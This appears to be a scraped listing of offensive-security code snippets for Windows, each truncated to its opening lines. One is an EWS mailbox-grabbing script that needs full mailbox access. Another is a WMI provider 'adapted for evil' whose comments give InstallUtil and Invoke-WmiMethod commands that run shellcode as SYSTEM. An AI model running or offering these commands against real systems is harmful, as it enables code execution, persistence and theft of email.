| #For this example you need an Azure App registered with a self-signed cert and a user with EWS access to grab email. | |
| #You need AzureAD Module (Save-Module AzureAD -Path C:\temp) | |
| #You need EWS API 2.2 (www.microsoft.com/en-us/download/details.aspx?id=35371) | |
| #The app needs to have Office 365 API access to read email. | |
| # Permission under Office 365 Exchange Online: | |
| # Admin : Use Exchange Web Services with full access to all mailboxes | |
| # Delegate : Delegated permissions: full_access_as_user – Access mailbox as signed in user via Exc… | |
| # Cert : https://github.com/Azure-Samples/active-directory-dotnet-daemon-certificate-credential/blob/master/Manual-Configuration-Steps.md | |
| <# | |
| $cert=New-SelfSignedCertificate -Subject "CN=Office365APIDemo" -CertStoreLocation "Cert:\CurrentUser\My" -KeyExportPolicy Exportable -KeySpec Signature |
| Function Invoke-EncodeAssembly | |
| { | |
| [CmdletBinding()] | |
| Param( | |
| [Parameter(Mandatory=$true)] | |
| [String] | |
| $binaryPath, | |
| [Parameter(Mandatory=$true)] | |
| [String] |
| // Based On LocalAdmin WMI Provider by Roger Zander | |
| // http://myitforum.com/cs2/blogs/rzander/archive/2008/08/12/how-to-create-a-wmiprovider-with-c.aspx | |
| // Adapted For Evil By @subTee | |
| // Executes x64 ShellCode | |
| // | |
| // Deliver and Install dll | |
| // C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe /i EvilWMIProvider.dll | |
| // Invoke calc for SYSTEM level calculations | |
| // Invoke-WmiMethod -Class Win32_Evil -Name ExecShellCalcCode | |
| // Invoke-WmiMethod -Namespace root\cimv2 -Class Win32_Evil -Name ExecShellCode -ArgumentList @(0x90,0x90,0x90), $null |
| function Install-ScheduledTask { | |
| <# | |
| .SYNOPSIS | |
| Install a scheduled task using Schedule.Service COM object. | |
| .DESCRIPTION | |
| This function installs a scheduled task using Schedule.Service COM object. | |
| .PARAMETER TaskPath | |
| String. The path of the task. | |
| .PARAMETER TaskName |
| #include <stdio.h> | |
| #include <windows.h> | |
| #include <wincrypt.h> | |
| #include <tlhelp32.h> | |
| #include <ntdef.h> | |
| #include <winternl.h> | |
| #include "main.h" | |
| /****************************************************************************************************/ |
| using System; | |
| using System.IO; | |
| using System.Net; | |
| using System.Text; | |
| using System.IO.Compression; | |
| using System.Collections.Generic; | |
| using System.Configuration.Install; | |
| using System.Runtime.InteropServices; |
| using System; | |
| using System.IO; | |
| using System.Text; | |
| using System.IO.Compression; | |
| using System.EnterpriseServices; | |
| using System.Collections.Generic; | |
| using System.Runtime.InteropServices; | |
| using System.Security.Cryptography; | |
| /* |
| import requests | |
| import json | |
| import time | |
| import argparse | |
| import getpass | |
| import os | |
| import sys | |
| def main(): |
| using System; | |
| using System.Collections.Generic; | |
| using System.Linq; | |
| using System.Runtime.CompilerServices; | |
| using System.Net; | |
| using System.Reflection; | |
| using System.Runtime.InteropServices; | |
| namespace Test | |
| { | |
| // CCOB IS THE GOAT |
| import os | |
| import sys | |
| try: | |
| import pefile | |
| import argparse | |
| import requests | |
| from bs4 import BeautifulSoup | |
| except ImportError as e: | |
| print("[-] One of the following module is not installed:") | |
| print("\t- bs4") |